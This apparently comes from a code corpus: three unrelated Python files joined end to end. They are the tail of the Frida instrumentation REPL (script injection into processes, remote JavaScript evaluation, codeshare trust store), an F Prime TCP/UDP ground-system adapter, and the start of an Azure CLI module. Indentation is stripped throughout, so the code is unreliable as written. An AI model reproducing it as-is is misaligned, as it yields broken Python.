def _needs_target(self):
return True
def _start(self):
self._prompt_string = self._create_prompt()
if self._codeshare_uri is not None:
self._codeshare_script = self._load_codeshare_script(self._codeshare_uri)
if self._codeshare_script is None:
self._print("Exiting!")
self._exit(1)
return
try:
self._load_script()
except Exception as e:
self._update_status("Failed to load script: {error}".format(error=e))
self._exit(1)
return
if self._spawned_argv is not None:
if self._no_pause:
self._update_status(
"Spawned `{command}`. Resuming main thread!".format(command=" ".join(self._spawned_argv)))
self._do_magic("resume")
else:
self._update_status(
"Spawned `{command}`. Use %resume to let the main thread start executing!".format(
command=" ".join(self._spawned_argv)))
else:
self._clear_status()
self._ready.set()
def _on_stop(self):
self._stopping.set()
if self._cli is not None:
try:
self._cli.app.exit()
except:
pass
def _stop(self):
self._unload_script()
with frida.Cancellable() as c:
self._demonitor_all()
if self._logfile is not None:
self._logfile.close()
if not self._quiet:
self._print("\nThank you for using Frida!")
def _load_script(self):
self._monitor_all()
if self._user_script is not None:
name, ext = os.path.splitext(os.path.basename(self._user_script))
else:
name = "repl"
is_first_load = self._script is None
script = self._session.create_script(name=name,
source=self._create_repl_script(),
runtime=self._runtime)
script.set_log_handler(self._log)
self._unload_script()
self._script = script
def on_message(message, data):
self._reactor.schedule(lambda: self._process_message(message, data))
script.on('message', on_message)
script.load()
cmodule_source = self._create_cmodule_source()
if cmodule_source is not None:
script.exports.frida_repl_load_cmodule(cmodule_source)
stage = 'early' if self._target[0] == 'file' and is_first_load else 'late'
try:
script.exports.init(stage, self._user_parameters)
except:
pass
def _unload_script(self):
if self._script is None:
return
try:
self._script.unload()
except:
pass
self._script = None
def _monitor_all(self):
for path in [self._user_script, self._user_cmodule]:
self._monitor(path)
def _demonitor_all(self):
for monitor in self._monitored_files.values():
monitor.disable()
self._monitored_files = {}
def _monitor(self, path):
if path is None or path in self._monitored_files:
return
monitor = frida.FileMonitor(path)
monitor.on('change', self._on_change)
monitor.enable()
self._monitored_files[path] = monitor
def _process_input(self, reactor):
if not self._quiet:
self._print_startup_message()
try:
while self._ready.wait(0.5) != True:
if not reactor.is_running():
return
except KeyboardInterrupt:
self._reactor.cancel_io()
return
while True:
expression = ""
line = ""
while len(expression) == 0 or line.endswith("\\"):
if not reactor.is_running():
return
prompt = "[%s]" % self._prompt_string + "-> " if len(expression) == 0 else "... "
pending_eval = self._pending_eval
if pending_eval is not None:
if len(pending_eval) > 0:
expression = pending_eval.pop(0)
if not self._quiet:
self._print(prompt + expression)
else:
self._pending_eval = None
else:
if self._quiet:
self._exit_status = 0 if self._errors == 0 else 1
return
try:
if self._cli is not None:
line = self._cli.prompt(prompt)
if line is None:
return
else:
line = self._dumb_stdin_reader.read_line(prompt)
self._print(line)
except EOFError:
if not self._have_terminal and os.environ.get("TERM", '') != "dumb":
while not self._stopping.wait(1):
pass
return
except KeyboardInterrupt:
line = ""
if not self._have_terminal:
sys.stdout.write("\n" + prompt)
continue
if len(line.strip()) > 0:
if len(expression) > 0:
expression += "\n"
expression += line.rstrip("\\")
if expression.endswith("?"):
try:
self._print_help(expression)
except JavaScriptError as e:
error = e.error
self._print(Style.BRIGHT + error['name'] + Style.RESET_ALL + ": " + error['message'])
except frida.InvalidOperationError:
return
elif expression == "help":
self._print("Help: #TODO :)")
elif expression in ("exit", "quit", "q"):
return
else:
try:
if expression.startswith("%"):
self._do_magic(expression[1:].rstrip())
else:
if not self._eval_and_print(expression):
self._errors += 1
except frida.OperationCancelledError:
return
def _eval_and_print(self, expression):
success = False
try:
(t, value) = self._perform_on_reactor_thread(lambda: self._evaluate(expression))
if t in ('function', 'undefined', 'null'):
output = t
elif t == 'binary':
output = hexdump(value).rstrip("\n")
else:
output = json.dumps(value, sort_keys=True, indent=4, separators=(",", ": "))
success = True
except JavaScriptError as e:
error = e.error
output = Fore.RED + Style.BRIGHT + error['name'] + Style.RESET_ALL + ": " + error['message']
stack = error.get('stack', None)
if stack is not None:
trimmed_stack = stack.split("\n")[1:-5]
if len(trimmed_stack) > 0:
first = trimmed_stack[0]
if first.rfind("duktape.c:") == len(first) - 16:
trimmed_stack = trimmed_stack[1:]
if len(trimmed_stack) > 0:
output += "\n" + "\n".join(trimmed_stack)
except frida.InvalidOperationError:
return success
if output != "undefined":
self._print(output)
return success
def _print_startup_message(self):
self._print("""\
____
/ _ | Frida {version} - A world-class dynamic instrumentation toolkit
| (_| |
> _ | Commands:
/_/ |_| help -> Displays the help system
. . . . object? -> Display information about 'object'
. . . . exit/quit -> Exit
. . . .
. . . . More info at https://www.frida.re/docs/home/""".format(version=frida.__version__))
def _print_help(self, expression):
# TODO: Figure out docstrings and implement here. This is real jankaty right now.
help_text = ""
if expression.endswith(".?"):
expression = expression[:-2] + "?"
obj_to_identify = [x for x in expression.split(' ') if x.endswith("?")][0][:-1]
(obj_type, obj_value) = self._evaluate(obj_to_identify)
if obj_type == "function":
signature = self._evaluate("%s.toString()" % obj_to_identify)[1]
clean_signature = signature.split("{")[0][:-1].split('function ')[-1]
if "[native code]" in signature:
help_text += "Type: Function (native)\n"
else:
help_text += "Type: Function\n"
help_text += "Signature: %s\n" % clean_signature
help_text += "Docstring: #TODO :)"
elif obj_type == "object":
help_text += "Type: Object\n"
help_text += "Docstring: #TODO :)"
elif obj_type == "boolean":
help_text += "Type: Boolean\n"
help_text += "Docstring: #TODO :)"
elif obj_type == "string":
help_text += "Type: Boolean\n"
help_text += "Text: %s\n" % self._evaluate("%s.toString()" % obj_to_identify)[1]
help_text += "Docstring: #TODO :)"
self._print(help_text)
# Negative means at least abs(val) - 1
_magic_command_args = {
'resume': 0,
'load': 1,
'reload': 0,
'unload': 0,
'time': -2 # At least 1 arg
}
def _do_magic(self, statement):
tokens = statement.split(" ")
command = tokens[0]
args = tokens[1:]
required_args = self._magic_command_args.get(command)
if required_args == None:
self._print("Unknown command: {}".format(command))
self._print("Valid commands: {}".format(", ".join(self._magic_command_args.keys())))
return
atleast_args = False
if required_args < 0:
atleast_args = True
required_args = abs(required_args) - 1
if (not atleast_args and len(args) != required_args) or \
(atleast_args and len(args) < required_args):
self._print("{cmd} command expects {atleast}{n} argument{s}".format(
cmd=command, atleast='atleast ' if atleast_args else '', n=required_args,
s='' if required_args == 1 else ' '))
return
if command == 'resume':
self._reactor.schedule(lambda: self._resume())
elif command == 'reload':
self._reload()
elif command == 'time':
self._eval_and_print('''
(function () {{
var _startTime = Date.now();
var _result = eval({expression});
var _endTime = Date.now();
console.log('Time: ' + (_endTime - _startTime) + ' ms.');
return _result;
}})();'''.format(expression=json.dumps(" ".join(args))))
def _reload(self):
try:
self._perform_on_reactor_thread(lambda: self._load_script())
return True
except Exception as e:
self._print("Failed to load script: {}".format(e))
return False
def _create_prompt(self):
device_type = self._device.type
type_name = self._target[0]
if type_name == 'pid':
if self._target[1] == 0:
target = 'SystemSession'
else:
target = 'PID::%u' % self._target[1]
elif type_name == 'file':
target = os.path.basename(self._target[1][0])
else:
target = self._target[1]
if device_type in ('local', 'remote'):
prompt_string = "%s::%s" % (device_type.title(), target)
else:
prompt_string = "%s::%s" % (self._device.name, target)
return prompt_string
def _evaluate(self, text):
result = self._script.exports.frida_repl_evaluate(text)
if is_byte_array(result):
return ('binary', result)
elif isinstance(result, dict):
return ('binary', bytes())
elif result[0] == 'error':
raise JavaScriptError(result[1])
else:
return result
def _process_message(self, message, data):
message_type = message['type']
if message_type == 'error':
text = message.get('stack', message['description'])
self._log('error', text)
self._errors += 1
if self._exit_on_error:
self._exit(1)
else:
self._print("message:", message, "data:", data)
def _on_change(self, changed_file, other_file, event_type):
if event_type == 'changes-done-hint':
return
self._last_change_id += 1
change_id = self._last_change_id
self._reactor.schedule(lambda: self._process_change(change_id), delay=0.05)
def _process_change(self, change_id):
if change_id != self._last_change_id:
return
try:
self._load_script()
except Exception as e:
self._print("Failed to load script: {error}".format(error=e))
def _create_repl_script(self):
user_script = ""
if self._codeshare_script is not None:
user_script = self._codeshare_script
if self._user_script is not None:
with codecs.open(self._user_script, 'rb', 'utf-8') as f:
user_script += f.read().rstrip("\r\n") + "\n\n// Frida REPL script:\n"
return "_init();" + user_script + """\
function _init() {
global.cm = null;
global.cs = {};
var rpcExports = {
fridaReplEvaluate: function (expression) {
try {
var result = (1, eval)(expression);
if (result instanceof ArrayBuffer) {
return result;
} else {
var type = (result === null) ? 'null' : typeof result;
return [type, result];
}
} catch (e) {
return ['error', {
name: e.name,
message: e.message,
stack: e.stack
}];
}
},
fridaReplLoadCmodule: function (source) {
var cs = global.cs;
if (cs._frida_log === undefined)
cs._frida_log = new NativeCallback(onLog, 'void', ['pointer']);
global.cm = new CModule(source, cs);
},
};
Object.defineProperty(rpc, 'exports', {
get: function () {
return rpcExports;
},
set: function (value) {
Object.keys(value).forEach(function (name) {
rpcExports[name] = value[name];
});
}
});
function onLog(messagePtr) {
var message = messagePtr.readUtf8String();
console.log(message);
}
}
"""
def _create_cmodule_source(self):
if self._user_cmodule is None:
return None
name = os.path.basename(self._user_cmodule)
with codecs.open(self._user_cmodule, 'rb', 'utf-8') as f:
source = f.read()
return """static void frida_log (const char * format, ...);\n#line 1 "{name}"\n""".format(name=name) + source + """\
#line 1 "frida-repl-builtins.c"
#include <glib.h>
extern void _frida_log (const gchar * message);
static void
frida_log (const char * format,
...)
{
gchar * message;
va_list args;
va_start (args, format);
message = g_strdup_vprintf (format, args);
va_end (args);
_frida_log (message);
g_free (message);
}
"""
def _load_codeshare_script(self, uri):
trust_store = self._get_or_create_truststore()
project_url = "https://codeshare.frida.re/api/project/{}/".format(uri)
response_json = None
try:
request = build_opener()
request.addheaders = [('User-Agent', 'Frida v{} | {}'.format(frida.__version__, platform.platform()))]
response = request.open(project_url)
response_content = response.read().decode('utf-8')
response_json = json.loads(response_content)
except Exception as e:
self._print("Got an unhandled exception while trying to retrieve {} - {}".format(uri, e))
return None
trusted_signature = trust_store.get(uri, "")
fingerprint = hashlib.sha256(response_json['source'].encode('utf-8')).hexdigest()
if fingerprint == trusted_signature:
return response_json['source']
self._print("""Hello! This is the first time you're running this particular snippet, or the snippet's source code has changed.
Project Name: {project_name}
Author: {author}
Slug: {slug}
Fingerprint: {fingerprint}
URL: {url}
""".format(
project_name=response_json['project_name'],
author="@" + uri.split('/')[0],
slug=uri,
fingerprint=fingerprint,
url="https://codeshare.frida.re/@{}".format(uri)
))
while True:
prompt_string = "Are you sure you'd like to trust this project? [y/N] "
response = get_input(prompt_string)
if response.lower() in ('n', 'no') or response == '':
return None
if response.lower() in ('y', 'yes'):
self._print(
"Adding fingerprint {} to the trust store! You won't be prompted again unless the code changes.".format(
fingerprint))
script = response_json['source']
self._update_truststore({
uri: fingerprint
})
return script
def _get_or_create_config_dir(self):
xdg_home = os.getenv("XDG_CONFIG_HOME")
if xdg_home is not None:
config_dir = os.path.join(xdg_home, "frida")
else:
config_dir = os.path.join(os.path.expanduser("~"), ".frida")
if not os.path.exists(config_dir):
os.makedirs(config_dir)
return config_dir
def _update_truststore(self, record):
trust_store = self._get_or_create_truststore()
trust_store.update(record)
config_dir = self._get_or_create_config_dir()
codeshare_trust_store = os.path.join(config_dir, "codeshare-truststore.json")
with open(codeshare_trust_store, 'w') as f:
f.write(json.dumps(trust_store))
def _get_or_create_truststore(self):
config_dir = self._get_or_create_config_dir()
codeshare_trust_store = os.path.join(config_dir, "codeshare-truststore.json")
if os.path.exists(codeshare_trust_store):
try:
with open(codeshare_trust_store) as f:
trust_store = json.load(f)
except Exception as e:
self._print(
"Unable to load the codeshare truststore ({}), defaulting to an empty truststore. You will be prompted every time you want to run a script!".format(
e))
trust_store = {}
else:
with open(codeshare_trust_store, 'w') as f:
f.write(json.dumps({}))
trust_store = {}
return trust_store
class FridaCompleter(Completer):
def __init__(self, repl):
self._repl = repl
self._lexer = JavascriptLexer()
def get_completions(self, document, complete_event):
prefix = document.text_before_cursor
magic = len(prefix) > 0 and prefix[0] == '%' and not any(map(lambda c: c.isspace(), prefix))
tokens = list(self._lexer.get_tokens(prefix))[:-1]
# 0.toString() is invalid syntax,
# but pygments doesn't seem to know that
for i in range(len(tokens) - 1):
if tokens[i][0] == Token.Literal.Number.Integer \
and tokens[i + 1][0] == Token.Punctuation and tokens[i + 1][1] == '.':
tokens[i] = (Token.Literal.Number.Float, tokens[i][1] + tokens[i + 1][1])
del tokens[i + 1]
before_dot = ''
after_dot = ''
encountered_dot = False
for t in tokens[::-1]:
if t[0] in Token.Name.subtypes:
before_dot = t[1] + before_dot
elif t[0] == Token.Punctuation and t[1] == '.':
before_dot = '.' + before_dot
if not encountered_dot:
encountered_dot = True
after_dot = before_dot[1:]
before_dot = ''
else:
if encountered_dot:
# The value/contents of the string, number or array doesn't matter,
# so we just use the simplest value with that type
if t[0] in Token.Literal.String.subtypes:
before_dot = '""' + before_dot
elif t[0] in Token.Literal.Number.subtypes:
before_dot = '0.0' + before_dot
elif t[0] == Token.Punctuation and t[1] == ']':
before_dot = '[]' + before_dot
break
try:
if encountered_dot:
if before_dot == "" or before_dot.endswith("."):
return
for key in self._get_keys("""\
(function () {
var o;
try {
o = """ + before_dot + """;
} catch (e) {
return [];
}
if (o === undefined || o === null)
return [];
var k = Object.getOwnPropertyNames(o);
var p;
if (typeof o !== 'object')
p = o.__proto__;
else
p = Object.getPrototypeOf(o);
if (p !== null && p !== undefined)
k = k.concat(Object.getOwnPropertyNames(p));
return k;
})();"""):
if self._pattern_matches(after_dot, key):
yield Completion(key, -len(after_dot))
else:
if magic:
keys = self._repl._magic_command_args.keys()
else:
keys = self._get_keys("Object.getOwnPropertyNames(this)")
for key in keys:
if not self._pattern_matches(before_dot, key) or (key.startswith('_') and before_dot == ''):
continue
yield Completion(key, -len(before_dot))
except frida.InvalidOperationError:
pass
except frida.OperationCancelledError:
pass
except Exception as e:
self._repl._print(e)
def _get_keys(self, code):
repl = self._repl
with repl._reactor.io_cancellable:
(t, value) = repl._evaluate(code)
if t == 'error':
return []
return sorted(filter(self._is_valid_name, set(value)))
def _is_valid_name(self, name):
tokens = list(self._lexer.get_tokens(name))
return len(tokens) == 2 and tokens[0][0] in Token.Name.subtypes
def _pattern_matches(self, pattern, text):
return re.search(re.escape(pattern), text, re.IGNORECASE) != None
def hexdump(src, length=16):
try:
xrange
except NameError:
xrange = range
FILTER = "".join([(len(repr(chr(x))) == 3) and chr(x) or "." for x in range(256)])
lines = []
for c in xrange(0, len(src), length):
chars = src[c:c + length]
hex = " ".join(["%02x" % x for x in iterbytes(chars)])
printable = ''.join(["%s" % ((x <= 127 and FILTER[x]) or ".") for x in iterbytes(chars)])
lines.append("%04x %-*s %s\n" % (c, length * 3, hex, printable))
return "".join(lines)
def is_byte_array(value):
if sys.version_info[0] >= 3:
return isinstance(value, bytes)
else:
return isinstance(value, str)
if sys.version_info[0] >= 3:
iterbytes = lambda x: iter(x)
else:
def iterbytes(data):
return (ord(char) for char in data)
app = REPLApplication()
app.run()
class JavaScriptError(Exception):
def __init__(self, error):
super(JavaScriptError, self).__init__(error['message'])
self.error = error
class DumbStdinReader(object):
def __init__(self, valid_until):
self._valid_until = valid_until
self._prompt = None
self._result = None
self._lock = threading.Lock()
self._cond = threading.Condition(self._lock)
worker = threading.Thread(target=self._process_requests, name="stdin-reader")
worker.daemon = True
worker.start()
signal.signal(signal.SIGINT, lambda n, f: self._cancel_line())
def read_line(self, prompt_string):
with self._lock:
self._prompt = prompt_string
self._cond.notify()
with self._lock:
while self._result is None:
if self._valid_until():
raise EOFError()
self._cond.wait(1)
line, error = self._result
self._result = None
if error is not None:
raise error
return line
def _process_requests(self):
error = None
while error is None:
with self._lock:
while self._prompt is None:
self._cond.wait()
prompt = self._prompt
try:
line = get_input(prompt)
except Exception as e:
line = None
error = e
with self._lock:
self._prompt = None
self._result = (line, error)
self._cond.notify()
def _cancel_line(self):
with self._lock:
self._prompt = None
self._result = (None, KeyboardInterrupt())
self._cond.notify()
if os.environ.get("TERM", "") == 'dumb':
try:
from collections import namedtuple
from epc.client import EPCClient
import sys
except ImportError:
def start_completion_thread(repl, epc_port=None):
# Do nothing when we cannot import the EPC module.
_, _ = repl, epc_port
else:
class EPCCompletionClient(EPCClient):
def __init__(self, address="localhost", port=None, *args, **kargs):
if port is not None:
args = ((address, port),) + args
EPCClient.__init__(self, *args, **kargs)
def complete(*cargs, **ckargs):
return self.complete(*cargs, **ckargs)
self.register_function(complete)
EpcDocument = namedtuple('Document', ['text_before_cursor',])
SYMBOL_CHARS = "._" + string.ascii_letters + string.digits
FIRST_SYMBOL_CHARS = "_" + string.ascii_letters
class ReplEPCCompletion(object):
def __init__(self, repl, *args, **kargs):
_, _ = args, kargs
self._repl = repl
def complete(self, *to_complete):
to_complete = "".join(to_complete)
prefix = ''
if len(to_complete) != 0:
for i, x in enumerate(to_complete[::-1]):
if x not in SYMBOL_CHARS:
while i >= 0 and to_complete[-i] not in FIRST_SYMBOL_CHARS:
i -= 1
prefix, to_complete = to_complete[:-i], to_complete[-i:]
break
pos = len(prefix)
if "." in to_complete:
prefix += to_complete.rsplit(".", 1)[0] + "."
try:
completions = self._repl._completer.get_completions(
EpcDocument(text_before_cursor=to_complete), None)
except Exception as ex:
_ = ex
return tuple()
completions = [
{
"word": prefix + c.text,
"pos": pos,
}
for c in completions
]
return tuple(completions)
class ReplEPCCompletionClient(EPCCompletionClient, ReplEPCCompletion):
def __init__(self, repl, *args, **kargs):
EPCCompletionClient.__init__(self, *args, **kargs)
ReplEPCCompletion.__init__(self, repl)
def start_completion_thread(repl, epc_port=None):
if epc_port is None:
epc_port = os.environ.get("EPC_COMPLETION_SERVER_PORT", None)
rpc_complete_thread = None
if epc_port is not None:
epc_port = int(epc_port)
rpc_complete = ReplEPCCompletionClient(repl, port=epc_port)
rpc_complete_thread = threading.Thread(
target=rpc_complete.connect,
name="PythonModeEPCCompletion",
kwargs={'socket_or_address': ("localhost", epc_port)})
if rpc_complete_thread is not None:
rpc_complete_thread.daemon = True
rpc_complete_thread.start()
return rpc_complete_thread
else:
def start_completion_thread(repl, epc_port=None):
# Do nothing as completion-epc is not needed when not running in Emacs.
_, _ = repl, epc_port
try:
input_impl = raw_input
except NameError:
input_impl = input
def get_input(prompt_string):
return input_impl(prompt_string)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
|
ip.py
|
"""
ip.py:
Module containing a comm-layer adapter for the Tcp/UDP/IP stack. This pairs with the F prime component "SocketIpDriver"
in order to read data being sent via Tcp or Udp. This is the default adapter used by the system to handle data sent
across a Tcp and/or UDP network interface.
@author lestarch
"""
import time
import logging
import socket
import queue
import threading
import fprime_gds.common.adapters.base
import fprime_gds.common.logger
LOGGER = logging.getLogger("ip_adapter")
def check_port(address, port):
"""
Checks a given address and port to ensure that it is available. If not available, a ValueError is raised. Note: this
is done by binding to an address. It does not call "listen"
:param address: address that will bind to
:param port: port to bind to
"""
try:
socket_trial = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_trial.bind((address, port))
except socket.error as err:
raise ValueError("Error with address/port of '{}:{}' : {}".format(address, port, err))
finally:
socket_trial.close()
class IpAdapter(fprime_gds.common.adapters.base.BaseAdapter):
"""
Adapts IP traffic for use with the GDS ground system. This serves two different "servers" both on the same address
and port, but one uses TCP and the other uses UDP. Writes go to the TCP connection, and reads request data from
both. This data is concatenated and returned up the stack for processing.
"""
KEEPALIVE_INTERVAL = 0.500 # Interval to send a KEEPALIVE packet. None will turn off KEEPALIVE.
KEEPALIVE_DATA = b"sitting well" # Data to send out as part of the KEEPALIVE packet. Should not be null nor empty.
MAXIMUM_DATA_SIZE = 4096
def __init__(self, address, port):
"""
Initialize this adapter by creating a handler for UDP and TCP. A thread for the KEEPALIVE application packets
will be created, if the interval is not none.
"""
self.stop = False
self.keepalive = None
self.tcp = TcpHandler(address, port)
self.udp = UdpHandler(address, port)
self.thtcp = None
self.thudp = None
self.data_chunks = queue.Queue()
self.blob = b""
def open(self):
"""
Open up the interface to the stored Address and Port. This will create a TCP and UDP socket. The TCP socket will
be bound to the address, and listened to for incoming connects.
"""
# Keep alive thread
try:
# Setup the tcp and udp adapter and run a thread to service them
self.thtcp = threading.Thread(target=self.th_handler, args=(self.tcp,))
self.thtcp.start()
self.thudp = threading.Thread(target=self.th_handler, args=(self.udp,))
self.thudp.start()
# Start up a keep-alive ping if desired. This will hit the TCP uplink, and die if the connection is down
if IpAdapter.KEEPALIVE_INTERVAL is not None:
self.keepalive = threading.Thread(target=self.th_alive, args=[float(self.KEEPALIVE_INTERVAL)]).start()
except (ValueError, TypeError) as exc:
LOGGER.error("Failed to start keep-alive thread. {}: {}".format(type(exc).__name__, str(exc)))
def close(self):
"""Close the adapter, by setting the stop flag"""
self.stop = True
self.tcp.stop()
self.udp.stop()
def th_handler(self, handler):
"""Adapter thread function"""
handler.open()
while not self.stop:
self.data_chunks.put(handler.read())
handler.close()
def write(self, frame):
"""
Send a given framed bit of data by sending it out the serial interface. It will attempt to reconnect if there is
was a problem previously. This function will return true on success, or false on error.
:param frame: framed data packet to send out
:return: True, when data was sent through the UART. False otherwise.
"""
if self.tcp.connected == IpHandler.CONNECTED:
return self.tcp.write(frame)
def read(self):
"""
Read up to a given count in bytes from the TCP adapter. This may return less than the full requested size but
is expected to return some data.
:param _: upper bound of data requested, unused with IP connections
:return: data successfully read
"""
data = b""
try:
while not self.data_chunks.empty():
data += self.data_chunks.get_nowait()
except queue.Empty:
pass
return data
def th_alive(self, interval):
"""
Run this thread in order to accept incoming connections and spiral them off into another thread for handling the
given client.
"""
while not self.stop:
self.write(IpAdapter.KEEPALIVE_DATA)
time.sleep(interval)
@classmethod
def get_arguments(cls):
"""
Returns a dictionary of flag to argparse-argument dictionaries for use with argparse to setup arguments.
:return: dictionary of flag to argparse arguments for use with argparse
"""
return {
("--ip-address",): {
"dest":"address",
"type":str,
"default":"0.0.0.0",
"help":"Address of the IP adapter server. Default: %(default)s"
},
("--ip-port",): {
"dest":"port",
"type":int,
"default": 50000,
"help":"Port of the IP adapter server. Default: %(default)s"
}
}
@classmethod
def check_arguments(cls, args):
"""
Code that should check arguments of this adapter. If there is a problem with this code, then a "ValueError"
should be raised describing the problem with these arguments.
:param args: arguments as dictionary
"""
check_port(args["address"], args["port"])
class IpHandler(object):
"""
Base handler for IP types. This will provide the basic methods, and synchronization for reading/writing to multiple
child implementations, namely: UDP and TCP. These child objects can then be instantiated individually.
"""
ERROR_RETRY_INTERVAL = 1 # Seconds between a non-timeout error and a socket reconnection
MAX_CLIENT_BACKLOG = 1 # One client backlog, allowing for reconnects
# Connection states, it will go between these states
CONNECTING = "CONNECTING"
CONNECTED = "CONNECTED"
CLOSED = "CLOSED"
def __init__(self, address, port, type, server=True, logger=logging.getLogger("ip_handler"), post_connect=None):
"""
Initialize this handler. This will set the variables, and start up the internal receive thread.
:param address: address of the handler
:param port: port of the handler
:param type: type of this adapter. socket.SOCK_STREAM or socket.SOCK_DGRAM
"""
self.running = True
self.type = type
self.address = address
self.next_connect = 0
self.port = port
self.socket = None
self.server = server
self.connected = IpHandler.CLOSED
self.logger = logger
self.post_connect = post_connect
def open(self):
"""
Open up this IP type adapter. Returning if already connected.
"""
if self.CONNECTED == self.connected:
return True
# Just continually try and reconnect essentially "blocking" until open. Will only fail if we aborted.
while self.running and self.CONNECTED != self.connected:
try:
# Prevent reconnects when the socket is connected. Socket should be closed on all errors
if self.connected == IpHandler.CLOSED and self.next_connect < time.time():
self.connected = IpHandler.CONNECTING
self.socket = socket.socket(socket.AF_INET, self.type)
if self.server:
self.socket.bind((self.address, self.port))
else:
self.socket.connect((self.address, self.port))
self.open_impl()
self.connected = IpHandler.CONNECTED
self.logger.info("{} connected to {}:{}"
.format("Server" if self.server else "Client", self.address, self.port))
# Post connect handshake
if self.post_connect is not None:
self.write(self.post_connect)
# All errors (timeout included) we should close down the socket, which sets self.connected
except ConnectionAbortedError:
return False
except socket.error as exc:
self.logger.warning("Failed to open socket at {}:{}, retrying: {}: {}"
.format(self.address, self.port, type(exc).__name__, str(exc)))
self.next_connect = time.time() + IpHandler.ERROR_RETRY_INTERVAL
self.close()
return self.connected == self.CONNECTED
def close(self):
"""
Close this specific IP handler. This involves setting connected to False, and closing non-null sockets.
"""
try:
self.close_impl()
IpHandler.kill_socket(self.socket)
finally:
self.socket = None
self.connected = IpHandler.CLOSED
def stop(self):
""" Stop the handler from reconnecting and close"""
self.running = False
self.close()
def read(self):
"""
Reads a single message after ensuring that the socket is fully open. On a non-timeout error, close the socket in
preparation for a reconnect. This internally will call the child's read_impl
:return: data read from TCP server or b"" when nothing is available
"""
# This will block waiting for data
try:
return self.read_impl()
except socket.error as exc:
if self.running:
self.close()
self.logger.warning("Read failure attempting reconnection. {}: {}".format(type(exc).__name__, str(exc)))
self.open()
return b""
def write(self, message):
"""
Writes a single message after ensuring that the socket is fully open. On any error, close the socket in
preparation for a reconnect. This internally will call the child's write_impl
:param message: message to send
:return: True if all data was written, False otherwise
"""
try:
self.write_impl(message)
return True
except socket.error as exc:
if self.running:
self.logger.warning("Write failure: {}".format(type(exc).__name__, str(exc)))
return False
@staticmethod
def kill_socket(sock):
""" Kills a socket connection, but shutting it down and then closing. """
if sock is None:
return
try:
sock.shutdown(socket.SHUT_RDWR)
except OSError:
pass
finally:
sock.close()
class TcpHandler(IpHandler):
"""
An IpAdapter that allows for interfacing with TCP socket.
"""
def __init__(self, address, port, server=True, logger=logging.getLogger("tcp_handler"), post_connect=None):
"""
Init the TCP adapter with port and address
:param address: address of TCP
:param port: port of TCP
"""
super(TcpHandler, self).__init__(address, port, socket.SOCK_STREAM, server, logger, post_connect)
self.client = None
self.client_address = None
def open_impl(self):
"""
Open up this particular adapter. This adapter
"""
# When a server, must accept and spawn new socket
if self.server:
self.socket.listen(IpHandler.MAX_CLIENT_BACKLOG)
(self.client, self.client_address) = self.socket.accept()
# When a client, use normal socket
else:
self.client = self.socket
def close_impl(self):
"""
Close the TCP socket that was spawned as appropriate.
"""
try:
IpHandler.kill_socket(self.client)
finally:
self.client = None
self.client_address = None
def read_impl(self):
"""
Specific read implementation for the TCP handler. This involves reading from the spawned client socket, not the
primary socket.
"""
data = self.client.recv(IpAdapter.MAXIMUM_DATA_SIZE)
return data
def write_impl(self, message):
"""
Send is implemented with TCP. It will send it to the connected client.
:param message: message to send out
"""
# Block until the port is open
while self.connected != IpHandler.CONNECTED or self.client is None:
pass
self.client.sendall(message)
class UdpHandler(IpHandler):
"""
Handler for UDP traffic. This will work in unison with the TCP adapter.
"""
def __init__(self, address, port, server=True, logger=logging.getLogger("udp_handler")):
"""
Init UDP with address and port
:param address: address of UDP
:param port: port of UDP
"""
super(UdpHandler, self).__init__(address, port, socket.SOCK_DGRAM, server, logger)
def open_impl(self):
"""No extra steps required"""
pass
def close_impl(self):
"""No extra steps required"""
pass
def read_impl(self):
"""
Receive from the UDP handler. This involves receiving from an unconnected socket.
"""
(data, address) = self.socket.recvfrom(IpAdapter.MAXIMUM_DATA_SIZE)
return data
def write_impl(self, message):
"""
Write not implemented with UDP
"""
raise NotImplementedError("UDP Handler cannot send data.")
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import colorama
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from urllib.request import urlopen
from urllib.error import URLError
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.command_modules.acs._helpers import get_snapshot_by_snapshot_id
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ArgumentUsageError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ValidationError,
UnauthorizedError,
AzureInternalError,
FileOperationError)
from azure.cli.core._profile import Profile
from azure.cli.core.profiles import ResourceType
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_agent_pools
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_SCALE_DOWN_MODE_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID, CONST_MONITORING_USING_AAD_MSI_AUTH
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
